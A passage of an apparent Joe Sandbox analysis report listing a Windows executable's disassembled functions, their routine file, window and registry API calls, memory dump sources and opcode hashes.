                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                            • String ID:
                                                                            • API String ID: 1039859321-0
                                                                            • Opcode ID: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                            • Instruction ID: 14fc102064ef3ab447e4390d65f6ef6ce5acf5f288e443c002039df4b727e1a7
                                                                            • Opcode Fuzzy Hash: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                            • Instruction Fuzzy Hash: 1AF0E975208300BFE7059FB2EC16B1677E8E349725F62087FF404971D0EA795844D51D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00440C28 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                            • Instruction ID: 8982111d837b22a654d5e287c7045eba67879d0a6afc285262999d3c1c57c6fe
                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                            • Instruction Fuzzy Hash: 51F06234105109DF9F2CCF58D0E59AF7761EB45700B2085AFE60787350CA34AD20DA59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004164C0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 004164F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                            • Instruction ID: 34aaedb761569f87127437b87f660ad39376ae005fde3180b2cf9fb4127eef57
                                                                            • Opcode Fuzzy Hash: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                            • Instruction Fuzzy Hash: A7F013B2200510AFDB94CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD220EC108BB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00414924 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0041495F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042CBA8 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CBF0,?,00000001,?,?,00000000,?,0042CC42,00000000,004513A9,00000000,004513CA,?,00000000), ref: 0042CBD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                            • Instruction ID: dfed850972a7f4cfed0b3d6ce6ead54829112a593105f6481b619d55be1254e6
                                                                            • Opcode Fuzzy Hash: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                            • Instruction Fuzzy Hash: 1AE06571304708BFD701EB62AC93E5EBBACD745714B914876B400A7651D5B8AE00845C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044FC9C Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FCDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                            • Instruction ID: 6c681f427aec3a456f64e3edeb529b69c7e2eff4e0c15a83e21b0084e331bb23
                                                                            • Opcode Fuzzy Hash: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                            • Instruction Fuzzy Hash: BCE012A53541483ED340EEAD6C42FA777DC971A755F008033B998D7341D9A19E158BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042E670 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage
                                                                            • String ID:
                                                                            • API String ID: 1306739567-0
                                                                            • Opcode ID: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                            • Instruction ID: 7c82c80d86496392c3130c3e7de8882f0dfcc9e316fc406f93a4df2216b263d5
                                                                            • Opcode Fuzzy Hash: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                            • Instruction Fuzzy Hash: 21E026617843112AF23514567C83B7F1A4E83C0B04FE4842B7B00DE3C3DAAEAD09429E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,004235EC,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 00406329
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                            • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                            • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042DC1C Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                            • Instruction ID: 5aa87c08ff8936fcaaa84cf50ff31e6a06e3de0a8084b04fc6442f63f77fe161
                                                                            • Opcode Fuzzy Hash: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                            • Instruction Fuzzy Hash: BDE07EB2600129AF9B40DE8DDC81EEB37ADAB1D350F404016FA08D7200C2B4EC519BB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453438 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindClose.KERNEL32(00000000,000000FF,0046C394,00000000,0046D18D,?,00000000,0046D1D6,?,00000000,0046D30F,?,00000000,?,00000000), ref: 0045344E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                            • Instruction ID: f2f8a632f0a2160e68271c263a111a4b86933883cadac8f3c7310e18fb689ea2
                                                                            • Opcode Fuzzy Hash: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                            • Instruction Fuzzy Hash: A3E065B05046008BDB15DF3A848025676D15F89321F14C56AAC58CB3A6D63C840A8A56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004145EC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(0048F91E,?,0048F940,?,?,00000000,0048F91E,?,?), ref: 0041460B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406E78 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406E8C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
                                                                            • Instruction ID: 5e9ef0cb41ef517b54198f539e7e4457f1ce254f1207c5e451c0fee893fabf4d
                                                                            • Opcode Fuzzy Hash: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
                                                                            • Instruction Fuzzy Hash: 3DD05B763082107AD620A55BAC44DA76BDCCFC5770F11063EB558C71C1D6309C01C675
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004235BC Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00423568: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042357D
                                                                            • ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                              • Part of subcall function 00423598: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 004235B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 3202724764-0
                                                                            • Opcode ID: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
                                                                            • Instruction ID: 6e8deb3ed7ffb4c54c7bf11bddd21d475954711d807402a63cfbe74293682e9f
                                                                            • Opcode Fuzzy Hash: 5af24b6df55da37d4c3611fee004674b9993ece864ba4c629d2fd79d04b893e1
                                                                            • Instruction Fuzzy Hash: 03D05E123812743102107ABB280998B42A84D862AB388043BB54CDB202E91E8A81A1AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00424234 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: TextWindow
                                                                            • String ID:
                                                                            • API String ID: 530164218-0
                                                                            • Opcode ID: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                            • Instruction ID: a3b20f4c882213fa23ff33249cd178fa67041ba6f44abe22b1f00704e939aabb
                                                                            • Opcode Fuzzy Hash: c34688b727229efcedc1f2997f44e421d28f5fd8d0fc977b3f59e8ef08dab085
                                                                            • Instruction Fuzzy Hash: 4CD05EE27011702BCB01BBED54C4AC667CC8B8829AB1940BBF918EF257C638CE448398
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042CC00 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00450A53,00000000), ref: 0042CC0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                            • Instruction ID: 3d474633da5dc292dd1e9b08acfa0ea7ef8e6560f0837aa6ac70ccb6d2902417
                                                                            • Opcode Fuzzy Hash: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                            • Instruction Fuzzy Hash: 42C08CE03022001A9A1465BF2CC511F42C8891827A3A41F37F53CE32D2D27E88A72428
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00462FEC Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406E28 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A834,0040CDE0,?,00000000,?), ref: 00406E45
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                            • Opcode Fuzzy Hash: e13d03deedc56d39d84402585b6acf1c1ff9e47572f9c80b557e16e39ce6cc42
                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407210 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00491C72,00000000,00491E45,?,?,00000005,00000000,00491E79,?,?,00000000), ref: 0040721B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory
                                                                            • String ID:
                                                                            • API String ID: 1611563598-0
                                                                            • Opcode ID: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                            • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                            • Opcode Fuzzy Hash: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                            • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044FE04 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                              • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 734332943-0
                                                                            • Opcode ID: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
                                                                            • Instruction ID: c068c6aabe38557252dbc7cfbc7370f277f9ebc01c0ea26a9f887d834500d39f
                                                                            • Opcode Fuzzy Hash: 2e48029344297d65debf6e871ad896209e8586a13361bc78737a523636087be7
                                                                            • Instruction Fuzzy Hash: 2CC04CA130050047DF11A6AED5C190763D89E4D2163544176B504CF217D668D8184A14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042E24B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,0042E269), ref: 0042E25C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
